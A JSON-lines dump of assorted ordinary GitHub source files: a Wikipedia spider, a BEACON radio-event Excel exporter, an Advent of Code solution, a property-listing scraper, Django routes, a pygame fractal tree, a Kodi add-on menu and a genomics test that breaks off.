continue\n\n label_box = row.xpath('./th[@class=\"infobox-label\"]')\n if label_box:\n key = preProcessStr(\n \" \".join(\n label_box.xpath(\".//descendant-or-self::*/text()\").getall()\n )\n )\n\n if not key:\n continue\n\n label_data = row.xpath('./td[@class=\"infobox-data\"]')\n if label_data:\n value = preProcessStr(\n \" \".join(\n label_data.xpath(\".//descendant-or-self::*/text()\").getall()\n )\n )\n\n if value:\n info_card[key] = value\n\n data |= info_card\n\n # Invoking the shell from spiders to inspect responses\n # from scrapy.shell import inspect_response\n # inspect_response(response, self)\n return data\n","repo_name":"Smile040501/Search-Engine","sub_path":"wiki_crawler/wiki_crawler/spiders/wiki_spider.py","file_name":"wiki_spider.py","file_ext":"py","file_size_in_byte":3992,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"43480665729","text":"#!/usr/bin/env python3\n'''\nThis will add to the functionality of flipbook_reader.py and take any eventids_dict and try to collate the information\nfor the contained events into an excel file for easy note taking and viewing. It attempts to add airplane information\nand thus should be run with code that has pandas version >= 1.4.0. This version is also necessary for the used\n\"overlay\" function when writing to excel. \n'''\n\nimport sys\nimport os\nimport inspect\nimport h5py\nimport copy\nfrom pprint import pprint\n\nimport numpy\nimport scipy\nimport scipy.signal\nimport time\nimport pandas as pd\n\n#from beaconroot.examples.beacon_data_reader import Reader #Must be imported before matplotlib or else plots don't load.\nfrom beacon.tools.sine_subtract_cache import sineSubtractedReader as Reader\nfrom beacon.tools.data_handler import createFile\nfrom beacon.tools.fftmath import TemplateCompareTool\nfrom beacon.tools.fftmath import FFTPrepper\nfrom beacon.tools.correlator import Correlator\nfrom beacon.tools.data_slicer import dataSlicer\nfrom beacon.tools.flipbook_reader import flipbookToDict, concatenateFlipbookToDict, concatenateFlipbookToArray, concatenateEventDictToArray\nimport beacon.tools.get_plane_tracks as pt\nfrom tools.airplane_traffic_loader import getDataFrames, getFileNamesFromTimestamps\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as colors\nfrom matplotlib import cm, ticker\nfrom matplotlib.patches import Rectangle\nplt.ion()\n\nimport warnings\nwarnings.simplefilter(action='ignore', category=FutureWarning)\nwarnings.filterwarnings(\"ignore\")\n\nraw_datapath = os.environ['BEACON_DATA']\n#processed_datapath = os.path.join(os.environ['BEACON_PROCESSED_DATA'],'backup_pre_all_map_run_12-5-2021')\nprocessed_datapath = os.environ['BEACON_PROCESSED_DATA']\nprint('SETTING processed_datapath TO: ', processed_datapath)\n\ndef enu2Spherical(enu):\n '''\n 2d array like ((e_0, n_0, u_0), (e_1, n_1, u_1), ... , (e_i, n_i, u_i))\n\n Return in degrees\n '''\n r = numpy.linalg.norm(enu, axis=1)\n theta = numpy.degrees(numpy.arccos(enu[:,2]/r))\n phi = numpy.degrees(numpy.arctan2(enu[:,1],enu[:,0]))\n # import pdb; pdb.set_trace()\n return numpy.vstack((r,phi,theta)).T\n\n\ndef writeEventDictionaryToDataFrame(initial_eventids_dict, ds=None, include_airplanes=True):\n try:\n data_keys = [\n 'calibrated_trigtime',\n 'phi_best_choice',\n 'elevation_best_choice',\n 'cr_template_search_h',\n 'cr_template_search_v',\n 'cr_template_search_hSLICERMAXcr_template_search_v',\n 'hpol_peak_to_sidelobe',\n 'vpol_peak_to_sidelobe',\n 'hpol_peak_to_sidelobeSLICERMAXvpol_peak_to_sidelobe',\n 'hpol_normalized_map_value',\n 'vpol_normalized_map_value',\n 'above_normalized_map_max_line',\n 'above_snr_line',\n 'impulsivity_h',\n 'impulsivity_v',\n 'impulsivity_hSLICERADDimpulsivity_v',\n 'similarity_count_h',\n 'similarity_count_v',\n 'p2p_gap_h',\n 'p2p_gap_v',\n 'csnr_h',\n 'csnr_v',\n 'snr_h',\n 'snr_v',\n 'p2p_h',\n 'p2p_v',\n 'std_h',\n 'std_v',\n 'filtered_std_h',\n 'filtered_std_v',\n 'filtered_snr_h',\n 'filtered_snr_v',\n 'filtered_p2p_h',\n 'filtered_p2p_v',\n 'filtered_p2p_gap_h',\n 'filtered_p2p_gap_v',\n 'filtered_csnr_h',\n 'filtered_csnr_v']\n\n if numpy.all([numpy.issubdtype(k, numpy.integer) for k in initial_eventids_dict.keys()]) or numpy.all(numpy.array(list(initial_eventids_dict.keys()))%1 == 0):\n print('Assuming passed \"initial_eventids_dict\" as eventids_dict format')\n eventids_dict = copy.deepcopy(initial_eventids_dict)\n eventids_array = concatenateEventDictToArray(initial_eventids_dict)\n else:\n print('Assuming passed \"initial_eventids_dict\" as flipbook format')\n eventids_dict = concatenateFlipbookToDict(initial_eventids_dict)\n eventids_array = concatenateFlipbookToArray(initial_eventids_dict)\n\n runs = list(eventids_dict.keys())\n\n force_fit_order = 3 #None to use varying order\n\n # outpath = './airplane_event_flipbook_%i'%time.time() \n # os.mkdir(outpath)\n\n\n if ds is None:\n print(\"Preparing dataSlicer\")\n impulsivity_dset_key = 'LPf_80.0-LPo_14-HPf_20.0-HPo_4-Phase_1-Hilb_0-corlen_131072-align_0-shortensignals-0-shortenthresh-0.70-shortendelay-10.00-shortenlength-90.00-sinesubtract_1'\n time_delays_dset_key = 'LPf_80.0-LPo_14-HPf_20.0-HPo_4-Phase_1-Hilb_0-corlen_131072-align_0-shortensignals-0-shortenthresh-0.70-shortendelay-10.00-shortenlength-90.00-sinesubtract_1'\n map_direction_dset_key = 'LPf_85.0-LPo_6-HPf_25.0-HPo_8-Phase_1-Hilb_0-upsample_16384-maxmethod_0-sinesubtract_1-deploy_calibration_september_2021_minimized_calibration.json-n_phi_3600-min_phi_neg180-max_phi_180-n_theta_480-min_theta_0-max_theta_120-scope_allsky'\n\n ds = dataSlicer(runs, impulsivity_dset_key, time_delays_dset_key, map_direction_dset_key, analysis_data_dir=processed_datapath, verbose_setup=False)\n ds.prepareCorrelator()\n else:\n print('Using passed dataSlicer')\n\n status = numpy.zeros(len(eventids_array), dtype=str)\n\n data = { \n 'run' : eventids_array['run'],\n 'eventid' : eventids_array['eventid'],\n 'key' : eventids_array['key'],\n }\n\n monutau_links = []\n for eid in eventids_array:\n eventid = eid['eventid']\n run = eid['run']\n url = \"https://users.rcc.uchicago.edu/~cozzyd/monutau/#event&run=%i&entry=%i\"%(run,eventid)\n monutau_links.append('=HYPERLINK(\"%s\", \"link\")'%url)\n\n data['monutau'] = numpy.asarray(monutau_links)\n data['notes'] = [numpy.nan]*len(eventids_array)\n\n for key in data_keys:\n d = ds.getDataArrayFromParam(key, trigger_types=None, eventids_dict=copy.deepcopy(eventids_dict))\n data[key] = d\n\n if include_airplanes == True:\n print('Calculating airplane information')\n ds.prepareCorrelator()\n time_window_s = 5*60\n plot_distance_cut_limit = 500\n min_approach_cut_km = 1e6\n origin = ds.cor.A0_latlonel_hpol\n\n elevation_best_choice = ds.getDataFromParam(eventids_dict, 'elevation_best_choice')\n phi_best_choice = ds.getDataFromParam(eventids_dict, 'phi_best_choice')\n\n all_minimum_approach = numpy.zeros(len(eventids_array), dtype=float)\n all_event_times = numpy.zeros(len(eventids_array), dtype=float)\n all_at_event_time_r = numpy.zeros(len(eventids_array), dtype=float)\n all_at_event_time_phi = numpy.zeros(len(eventids_array), dtype=float)\n all_at_event_time_theta = numpy.zeros(len(eventids_array), dtype=float)\n all_minimum_approach_t = numpy.zeros(len(eventids_array), dtype=float)\n all_minimum_rpt_at_event_time = numpy.zeros(len(eventids_array), dtype=float)\n all_minimum_approach_r = numpy.zeros(len(eventids_array), dtype=float)\n all_minimum_approach_phi = numpy.zeros(len(eventids_array), dtype=float)\n all_minimum_approach_theta = numpy.zeros(len(eventids_array), dtype=float)\n all_minimum_approach_airplane = numpy.zeros(len(eventids_array), dtype='= 1 and int(pd.__version__.split('.')[1]) >= 4:\n # flipbook_path = '/home/dsouthall/scratch-midway2/event_flipbook_1643154940'#'/home/dsouthall/scratch-midway2/event_flipbook_1642725413'\n # flipbook_path = './airplane_event_flipbook_1643947072'\n flawed_runs = numpy.array([6537,6538,6539]) #numpy.array([5775,5981,5993,6033,6090,6520,6537,6538,6539]) \n filename = os.path.join(os.environ['BEACON_ANALYSIS_DIR'],'analysis','sept2021-week1-analysis','hand-scanned-event-info.xlsx')\n # include_airplanes = False\n for include_airplanes in [False, True]:\n #['/home/dsouthall/scratch-midway2/event_flipbook_1643154940', './airplane_event_flipbook_1643947072']\n for flipbook_path in ['./september-flipbook']:\n sorted_dict = flipbookToDict(flipbook_path, ignore_runs=flawed_runs)\n if True:\n sheetname = os.path.split(flipbook_path)[-1] + '_airplanes-included-%s'%str(include_airplanes)\n else:\n sheetname = 'raw_airplanes-included-%s'%str(include_airplanes)\n\n df = writeEventDictionaryToDataFrame(sorted_dict, include_airplanes=include_airplanes)\n writeDataFrameToExcel(df, filename, sheetname)\n # writeEventDictionaryToExcel(sorted_dict, filename, ds=None)\n else:\n print('This script requires pandas version >= 1.4.0')\n else:\n cmap = 'cool'#'coolwarm'\n impulsivity_dset_key = 'LPf_80.0-LPo_14-HPf_20.0-HPo_4-Phase_1-Hilb_0-corlen_131072-align_0-shortensignals-0-shortenthresh-0.70-shortendelay-10.00-shortenlength-90.00-sinesubtract_1'\n time_delays_dset_key = 'LPf_80.0-LPo_14-HPf_20.0-HPo_4-Phase_1-Hilb_0-corlen_131072-align_0-shortensignals-0-shortenthresh-0.70-shortendelay-10.00-shortenlength-90.00-sinesubtract_1'\n map_length = 16384\n map_direction_dset_key = 'LPf_85.0-LPo_6-HPf_25.0-HPo_8-Phase_1-Hilb_0-upsample_%i-maxmethod_0-sinesubtract_1-deploy_calibration_september_2021_minimized_calibration.json-n_phi_3600-min_phi_neg180-max_phi_180-n_theta_480-min_theta_0-max_theta_120-scope_allsky'%map_length\n \n run_batches = {}\n run_batches['batch_0'] = numpy.arange(5733,5974) # September data, should setup to auto add info to the \"notes\" section based off of existing sorting, and run this one those events for consistency\n run_batches['batch_1'] = numpy.arange(5974,6073)\n run_batches['batch_2'] = numpy.arange(6074,6173)\n run_batches['batch_3'] = numpy.arange(6174,6273)\n run_batches['batch_4'] = numpy.arange(6274,6373)\n run_batches['batch_5'] = numpy.arange(6374,6473)\n run_batches['batch_6'] = numpy.arange(6474,6573)\n run_batches['batch_7'] = numpy.arange(6574,6641)\n runs = numpy.array([])\n for k in (run_batches.keys()):\n runs = numpy.append(runs,run_batches[k])\n\n ds = dataSlicer(runs, impulsivity_dset_key, time_delays_dset_key, map_direction_dset_key, \\\n low_ram_mode=True,\\\n analysis_data_dir=processed_datapath, trigger_types=[2], remove_incomplete_runs=True)\n\n filename = os.path.join(os.environ['BEACON_ANALYSIS_DIR'],'analysis','paper', 'data','new-cut-event-info.xlsx')\n new_cut_dict = numpy.load( os.path.join( '/home/dsouthall/Projects/Beacon/beacon/analysis/paper/data/cuts_run5733-run6640_1652152119' , 'pass_all_cuts_eventids_dict.npy') , allow_pickle=True)[()]\n \n df = writeEventDictionaryToDataFrame(new_cut_dict, include_airplanes=False, ds=ds)\n writeDataFrameToExcel(df, filename, 'passing all cuts')\n\n old_cut_dicts = {}\n for i in range(8):\n f = os.path.join('/home/dsouthall/Projects/Beacon/beacon/analysis/paper/data/eventid_dicts', 'stage_2_eventids_dict_batch_%i.npy'%i)\n out = numpy.load( f , allow_pickle=True)[()]\n for run in list(out.keys()):\n old_cut_dicts[run] = out[run]\n\n\n new_cut_array = ds.organizeEventDict(new_cut_dict)\n old_cut_array = ds.organizeEventDict(old_cut_dicts)\n\n matching = ds.organizeEventDict(ds.returnCommonEvents(new_cut_dict, old_cut_dicts))\n matching_dict = ds.returnCommonEvents(new_cut_dict, old_cut_dicts)\n \n events_in_new_not_old = ds.organizeEventDict(ds.returnEventsAWithoutB(new_cut_dict, old_cut_dicts))\n events_in_new_not_old_dict = ds.returnEventsAWithoutB(new_cut_dict, old_cut_dicts)\n\n\n matching_df = df[numpy.logical_and(numpy.isin(df['run'], matching['run']), numpy.isin(df['eventid'], matching['eventid']))]\n writeDataFrameToExcel(matching_df, filename, 'in old')\n\n new_events_df = df[numpy.logical_and(numpy.isin(df['run'], events_in_new_not_old['run']), numpy.isin(df['eventid'], events_in_new_not_old['eventid']))]\n writeDataFrameToExcel(new_events_df, filename, 'new')\n\n\n\n","repo_name":"djsouthall/beacon","sub_path":"tools/write_event_dict_to_excel.py","file_name":"write_event_dict_to_excel.py","file_ext":"py","file_size_in_byte":23505,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"3665314078","text":"def run_main():\n increases = 0\n old_no = -1\n f = open(\"input/day1a.txt\")\n lines = list(map(int, f.readlines()))\n for i in range(0, 1998):\n a = lines[i]\n b = lines[i+1]\n c = lines[i+2]\n current_no = a + b + c\n if -1 < old_no < current_no:\n increases += 1\n old_no = current_no\n print(increases)\n\n\nif __name__ == '__main__':\n run_main()\n","repo_name":"jl881/aoc","sub_path":"2021/day1b.py","file_name":"day1b.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"43744444442","text":"import json\nimport re\nimport sys\nfrom urllib.request import urlopen, Request\n\nimport bs4\nimport requests\n\nexceptions = {}\nstatus_codes = {}\n\n\ndef main():\n global total_pages\n url = 'https://www.towerbudapest.com/en/sales'\n hdr = {\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 '\n 'Safari/537.11',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',\n 'Accept-Encoding': 'none',\n 'Accept-Language': 'en-US,en;q=0.8',\n 'Connection': 'keep-alive'}\n property_links = []\n property_data_list = []\n soup = bs4.BeautifulSoup(urlopen(Request(url, headers=hdr)).read(), features=\"lxml\")\n for paragraph in soup.select('p[class*=\"kill-margin\"]'):\n if 'Page' in str(paragraph.contents[0]):\n total_pages = int(paragraph.contents[0].split(' ')[10])\n break\n print(\"found \" + str(total_pages) + \" pages\")\n for i in range(total_pages):\n print('=', end='')\n print()\n while True:\n soup = bs4.BeautifulSoup(urlopen(Request(url, headers=hdr)).read(), features=\"lxml\")\n for tag in soup.findAll('a',\n attrs={\n 'href': re.compile(\"^https://www.towerbudapest.com/en/sales/budapest_property/\")}):\n property_links.append(tag.get('href'))\n rightButton = soup.select('div[class*=\"text-right\"]')[0].select('button')\n print('.', end='')\n sys.stdout.flush()\n if len(rightButton) != 0:\n url = rightButton[0]['onclick'].split(\"'\")[1]\n else:\n print()\n break\n print()\n print(\"found \" + str(len(property_links)) + \" links\")\n property_links = list(set(property_links))\n print(str(len(property_links)) + \" after removing duplicates\")\n for i in range(len(property_links)):\n if i % 10 == 0:\n print('=', end='')\n print()\n counter = 0\n global status_codes\n global exceptions\n for link in property_links:\n try:\n counter += 1\n if counter % 10 == 0:\n print('.', end='')\n sys.stdout.flush()\n property_data = {}\n content = urlopen(Request(link, headers=hdr)).read()\n soup = bs4.BeautifulSoup(content, features=\"lxml\")\n header = soup.select('div[class*=\"property-content\"]')[0].select('h1')[0].contents[0]\n property_data['name'] = header\n details = soup.select('div[class*=\"property-details-sidebar\"]')[0]\n\n for listitem in details.select('ul')[0].select('li'):\n new_key = listitem.select('strong')[0].contents[0].replace(':', '').lower().replace(' ', '')\n if len(listitem.contents) > 1:\n new_value = str(listitem.contents[1]).strip()\n if new_value == 'Yes':\n new_value = True\n if new_value == 'No':\n new_value = False\n else:\n new_value = True\n property_data[new_key] = new_value\n\n property_data['pricehuf'] = details.select('ul')[1].select('li')[1].contents[0].split()[0].replace('.', '')\n if len(details.select('ul')[1].select('li')) > 2:\n property_data['priceeur'] = details.select('ul')[1].select('li')[2].contents[0].split()[0].replace('.',\n '')\n\n # property_data['contact'] = details.select('ul')[2].select('li')[1].contents[0]\n\n property_data['name'] = property_data['name'].lower()\n recognized_suffixes = ['utca', 'út', 'tér', 'park']\n recognized_suffixes_english = ['street', 'road', 'square', 'park']\n split_name = (str(property_data['name'])).split()\n for s in split_name:\n if s in recognized_suffixes or s in recognized_suffixes_english:\n if s in recognized_suffixes:\n property_data['streetsuffix'] = s\n if s in recognized_suffixes_english:\n property_data['streetsuffix'] = recognized_suffixes[recognized_suffixes_english.index(s)]\n split_name.remove(s)\n property_data['streetname'] = ' '.join(split_name)\n break\n\n property_data['size'] = int(property_data['size'].split(' ')[0])\n\n property_data_list.append(property_data)\n r = requests.post(\"https://propertybuddy-database.herokuapp.com/properties\", json=property_data)\n # r = requests.post(\"http://localhost:8080/properties\", json=property_data)\n\n latest_status_code = (r.status_code, json.loads(r.content)['message'])\n if latest_status_code in status_codes:\n status_codes[latest_status_code] += 1\n else:\n status_codes[latest_status_code] = 1\n except Exception as e:\n latest_exception = str(e)\n if \"HTTPSConnectionPool\" in latest_exception and \"Max retries exceeded with url\" in latest_exception:\n latest_exception = latest_exception.split(\"(Caused\")[0]\n if latest_exception in exceptions:\n exceptions[latest_exception] += 1\n else:\n exceptions[latest_exception] = 1\n print()\n print()\n print('all done')\n end_print()\n\n\ndef end_print():\n print('status codes:')\n for c in status_codes:\n print(\"\\t\" + str(c[0]) + \"\\tx\" + str(status_codes[c]) + \"\\n\\t\\t\" + str(c[1]))\n print('exceptions:')\n for e in exceptions:\n print(\"\\t\" + e + \"\\tx\" + str(exceptions[e]))\n\n\ntry:\n main()\nexcept KeyboardInterrupt:\n print()\n print()\n print('exiting on user interrupt')\n end_print()\n","repo_name":"zapathy/webscraping","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"25697992927","text":"from django.urls import path\n\nfrom .views import OperationViewSet, CategoryView, CategoryListView, ListOperationsOfBill, FilterOperationsView, \\\n SearchView\n\nurlpatterns = [\n path('operation', OperationViewSet.as_view({\n 'post': 'create',\n 'delete': 'destroy',\n 'put': 'update',\n 'get': 'retrieve'\n })),\n path('operations', OperationViewSet.as_view({\n 'get': 'list'\n })),\n path('operations-of-bill', ListOperationsOfBill.as_view()),\n path('categories', CategoryListView.as_view({\n 'get': 'list'\n })),\n path('category', CategoryView.as_view({\n 'post': 'create'\n })),\n path('filter-operations', FilterOperationsView.as_view()),\n path('search', SearchView.as_view())\n]\n","repo_name":"bifenbecker/FinanceControl-bankAccounts","sub_path":"operations/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"11075056089","text":"import pygame, sys, math\n\nclass observer:\n def __init__(self):\n self.observer_list = []\n\n def add(self, objs):\n self.observer_list += objs\n\n def notify(self, pos):\n for observer in self.observer_list:\n d = observer.on_notify(pos)\n if d: return d\n\n return None\n\n\nclass slider:\n def __init__(self, pos, name, tree):\n self.x, self.y = pos\n self.height = 200\n self.name = name\n self.rect_width, self.rect_height = 20, 10\n self.slide = pygame.Rect((self.x-10,self.y+self.height/2-self.rect_height/2),(self.rect_width, self.rect_height))\n self.degrees = math.degrees(math.pi*(self.slide.y - self.y+self.rect_height/2)/(self.height))\n self.trees = tree\n\n def on_notify(self, pos):\n if (abs(pos[0]-self.x)<20) and (self.y pos[1])):\n self.slide.move_ip(0, pos[1]-self.slide.y)\n self.degrees = math.degrees(math.pi*(self.slide.y - self.y+self.rect_height/2)/(self.height))\n if self.name == \"teta1\": return (self.trees.teta[0], -math.radians(self.degrees))\n else :return (math.radians(self.degrees),self.trees.teta[1])\n return None\n\n\n def draw(self, surface):\n myfont = pygame.font.SysFont(\"\", 15)\n textsurface = myfont.render(\n f\"{self.name} {round(self.degrees,2)}\", False, (0,0,0)\n )\n textRect = textsurface.get_rect()\n textRect.center = (self.x, self.y-10)\n surface.blit(textsurface, textRect)\n\n pygame.draw.line(surface, (0,0,0), (self.x, self.y), (self.x, self.y+self.height), 2)\n pygame.draw.rect(surface, (0,0,110), self.slide)\n\n\nclass tree:\n def __init__(self, size, k, teta):\n self.w, self.h = size\n self.lenght = 100\n self.k = k\n self.teta = teta\n self.max = 15\n\n def update(self, teta):\n if teta:\n self.teta = teta\n\n def draw(self, surface, line=None, angle=math.pi/2, it=1):\n if not line: line = [(self.w/2, self.h), (self.w/2, self.h*3/4)]\n if it > self.max: return 0\n if it> 7*self.max//10: pygame.draw.line(surface, (71,148,71),line[0], line[1])\n else: pygame.draw.line(surface, (102,51,0),line[0], line[1])\n\n for i in range(2):\n x = self.lenght*(self.k[i]**it)*math.cos(angle + self.teta[i]) + line[-1][0]\n y = -self.lenght*(self.k[i]**it)*math.sin(angle + self.teta[i]) + line[-1][1]\n self.draw(surface,[line[-1], (x,y)], angle+self.teta[i], it+1)\n\n\nclass main:\n\n def __init__(self):\n self._running = True\n self._display_surf = None\n self.size = (600, 500)\n\n def on_init(self):\n pygame.init()\n self._display_surf = pygame.display.set_mode(self.size, 0 , 32)\n self._running = True\n self.tree = tree(self.size, [0.65, 0.75], [math.radians(20), -math.radians(10)])\n self.sliders = [slider((490, 50), \"teta1\", self.tree), slider((560, 50), \"teta2\", self.tree)]\n self.observers = observer()\n self.observers.add(self.sliders)\n\n def on_event(self, event):\n if event.type == pygame.QUIT:\n self._running = False\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n degrees = self.observers.notify(pygame.mouse.get_pos())\n self.tree.update(degrees)\n self.on_loop()\n\n def on_loop(self):\n self._display_surf.fill((255,255,255))\n self.tree.draw(self._display_surf)\n for slider in self.sliders:\n slider.draw(self._display_surf)\n pygame.display.update()\n\n def on_render(self):\n pass\n\n def on_cleanup(self):\n pygame.quit()\n sys.exit()\n\n def on_execute(self):\n if self.on_init() == False:\n self._running = False\n\n self.on_loop()\n while ( self._running ):\n for event in pygame.event.get():\n self.on_event(event)\n self.on_render()\n self.on_cleanup()\n\nif __name__ == \"__main__\":\n theApp = main()\n theApp.on_execute()\n","repo_name":"MasMat2/Fractals","sub_path":"treegame.py","file_name":"treegame.py","file_ext":"py","file_size_in_byte":4091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"30776906790","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Defines the StagedMoviesMenu class.\"\"\"\n\nimport xbmcgui\n\nfrom resources import ADDON_NAME\n\nfrom resources.lib.log import logged_function\n\nfrom resources.lib.misc import getstring\nfrom resources.lib.misc import notification\n\n\nclass StagedMoviesMenu():\n \"\"\"Provide windows for displaying staged movies, and tools for managing the items.\"\"\"\n\n # TODO: don't commit sql changes for \"... all\" until end\n # TODO: decorator for \"...all\" commands\n # TODO: load staged movies on init, use as instance variable, refresh as needed\n\n def __init__(self, database, progressdialog):\n \"\"\"__init__ StagedMoviesMenu.\"\"\"\n self.database = database\n self.progressdialog = progressdialog\n\n @logged_function\n def add_all(self, items):\n \"\"\"Add all staged movies to library.\"\"\"\n STR_ADDING_ALL_MOVIES = getstring(32042)\n STR_ALL_MOVIES_ADDED = getstring(32043)\n self.progressdialog.create_progressdialog(\n msg=STR_ADDING_ALL_MOVIES\n )\n for index, item in enumerate(items):\n self.progressdialog.update_progressdialog(\n index / len(items),\n item.title()\n )\n item.add_to_library()\n self.progressdialog.close_progressdialog()\n notification(STR_ALL_MOVIES_ADDED)\n\n @staticmethod\n def rename_dialog(item):\n \"\"\"Prompt input for new name, and rename if non-empty string.\"\"\"\n # TODO: move to utils or parent class so it's not duplicated\n input_ret = xbmcgui.Dialog().input(\n \"Title\",\n defaultt=item.title()\n )\n if input_ret:\n item.rename(input_ret)\n\n @logged_function\n def options(self, item):\n \"\"\"Provide options for a single staged movie in a dialog window.\"\"\"\n STR_ADD = getstring(32048)\n STR_REMOVE = getstring(32017)\n STR_REMOVE_AND_BLOCK = getstring(32049)\n STR_RENAME = getstring(32050)\n STR_STAGED_MOVIE_OPTIONS = getstring(32053)\n STR_BACK = getstring(32011)\n lines = [\n STR_ADD,\n STR_REMOVE,\n STR_REMOVE_AND_BLOCK,\n # STR_RENAME,\n STR_BACK\n ]\n ret = xbmcgui.Dialog().select(\n '{0} - {1} - {2}'.format(\n ADDON_NAME,\n STR_STAGED_MOVIE_OPTIONS,\n item.title),\n lines\n )\n if ret >= 0:\n if lines[ret] == STR_ADD:\n item.add_to_library()\n self.view_all()\n elif lines[ret] == STR_REMOVE:\n item.delete()\n self.view_all()\n elif lines[ret] == STR_REMOVE_AND_BLOCK:\n item.remove_and_block()\n self.view_all()\n elif lines[ret] == STR_RENAME:\n self.rename_dialog(item)\n self.options(item)\n elif lines[ret] == STR_BACK:\n return\n\n else:\n self.view_all()\n\n @logged_function\n def remove_all(self):\n \"\"\"Remove all staged movies.\"\"\"\n STR_REMOVING_ALL_MOVIES = getstring(32013)\n STR_ALL_MOVIES_REMOVED = getstring(32014)\n self.progressdialog.create_progressdialog(\n msg=STR_REMOVING_ALL_MOVIES\n )\n self.database.delete_item_from_table_with_status_or_showtitle(\n _type='movie',\n status='staged'\n )\n self.progressdialog.close_progressdialog()\n notification(STR_ALL_MOVIES_REMOVED)\n\n @logged_function\n def view_all(self):\n \"\"\"\n Display all staged movies, which are selectable and lead to options.\n\n Also provides additional options at bottom of menu.\n \"\"\"\n STR_NO_STAGED_MOVIES = getstring(32037)\n STR_ADD_ALL_MOVIES = getstring(32038)\n STR_REMOVE_ALL_MOVIES = getstring(32009)\n STR_BACK = getstring(32011)\n STR_STAGED_MOVIES = getstring(32004)\n staged_movies = list(\n self.database.get_content_items(\n status='staged',\n _type='movie'\n )\n )\n if not staged_movies:\n xbmcgui.Dialog().ok(ADDON_NAME, STR_NO_STAGED_MOVIES)\n return\n lines = [str(x) for x in staged_movies]\n lines += [\n STR_ADD_ALL_MOVIES,\n STR_REMOVE_ALL_MOVIES,\n STR_BACK\n ]\n ret = xbmcgui.Dialog().select(\n '{0} - {1}'.format(ADDON_NAME, STR_STAGED_MOVIES), lines\n )\n if ret >= 0:\n if ret < len(staged_movies): # staged item\n for i, item in enumerate(staged_movies):\n if ret == i:\n self.options(item)\n break\n elif lines[ret] == STR_ADD_ALL_MOVIES:\n self.add_all(staged_movies)\n elif lines[ret] == STR_REMOVE_ALL_MOVIES:\n self.remove_all()\n elif lines[ret] == STR_BACK:\n return\n","repo_name":"curdh/script.library.integration.tool","sub_path":"resources/lib/menus/staged_movies.py","file_name":"staged_movies.py","file_ext":"py","file_size_in_byte":5005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"}
+{"seq_id":"7955729399","text":"import numpy as np\nimport pytest\nfrom pandas._testing import assert_frame_equal\n\nfrom pandas_genomics import sim\nfrom pandas_genomics.sim import BAMS, SNPEffectEncodings, PenetranceTables\n\n\ndef assert_frame_not_equal(*args, **kwargs):\n try:\n assert_frame_equal(*args, **kwargs)\n except AssertionError:\n # frames are not equal\n pass\n else:\n # frames are equal\n raise AssertionError\n\n\n@pytest.mark.parametrize(\n \"pen_table,baseline,diff,expected\",\n [\n (sim.PenetranceTables.NULL, 0.1, 0.8, [0.5] * 9),\n (sim.PenetranceTables.NULL, 0.0, 0.5, [0.25] * 9),\n (\n sim.PenetranceTables.HET_HET,\n 0.25,\n 0.5,\n [0.25, 0.25, 0.25, 0.25, 0.75, 0.25, 0.25, 0.25, 0.25],\n ),\n (\n np.array(sim.PenetranceTables.HET_HET.value).reshape((3, 3)) * 10,\n 0.25,\n 0.5,\n [0.25, 0.25, 0.25, 0.25, 0.75, 0.25, 0.25, 0.25, 0.25],\n ),\n (\n sim.PenetranceTables.HET_HA,\n 0.1,\n 0.9,\n [0.1, 0.1, 0.1, 0.1, 0.1, 1.0, 0.1, 0.1, 0.1],\n ),\n pytest.param(\n sim.PenetranceTables.HET_HET,\n -1,\n 0,\n [0.0] * 9,\n marks=pytest.mark.xfail(raises=ValueError, strict=True),\n ),\n pytest.param(\n sim.PenetranceTables.HET_HET,\n 0.1,\n 0.91,\n [0.0] * 9,\n marks=pytest.mark.xfail(raises=ValueError, strict=True),\n ),\n pytest.param(\n [0, 0, 0, 0, 0, 0, 0, 0, 0],\n 0.1,\n 0.91,\n [0.0] * 9,\n marks=pytest.mark.xfail(raises=ValueError, strict=True),\n ),\n ],\n)\ndef test_pen_table_direct(pen_table, baseline, diff, expected):\n \"\"\"Test calculation of final penetrance table when a penetrance table is specified\"\"\"\n model = BAMS(pen_table=pen_table, penetrance_base=baseline, penetrance_diff=diff)\n np.isclose(model.pen_table, np.reshape(np.array(expected), newshape=(3, 3))).all()\n\n\n@pytest.mark.parametrize(\n \"eff1,eff2,baseline,diff,main1,main2,interaction,expected\",\n [\n (\n sim.SNPEffectEncodings.DOMINANT,\n sim.SNPEffectEncodings.DOMINANT,\n 0.1,\n 0.8,\n 1,\n 1,\n 0,\n [0.1, 0.5, 0.5, 0.5, 0.9, 0.9, 0.5, 0.9, 0.9],\n ),\n (\n sim.SNPEffectEncodings.DOMINANT,\n sim.SNPEffectEncodings.DOMINANT,\n 0.1,\n 0.8,\n 0,\n 0,\n 1,\n [0.1, 0.1, 0.1, 0.1, 0.9, 0.9, 0.1, 0.9, 0.9],\n ),\n (\n sim.SNPEffectEncodings.DOMINANT,\n sim.SNPEffectEncodings.DOMINANT,\n 0.1,\n 0.8,\n 1,\n 1,\n 10,\n [0.1, 1 / 6, 1 / 6, 1 / 6, 0.9, 0.9, 1 / 6, 0.9, 0.9],\n ),\n (\n sim.SNPEffectEncodings.ADDITIVE,\n sim.SNPEffectEncodings.RECESSIVE,\n 0.2,\n 0.4,\n 1,\n 1,\n -1,\n [0.2, 0.4, 0.6, 0.2, 0.4, 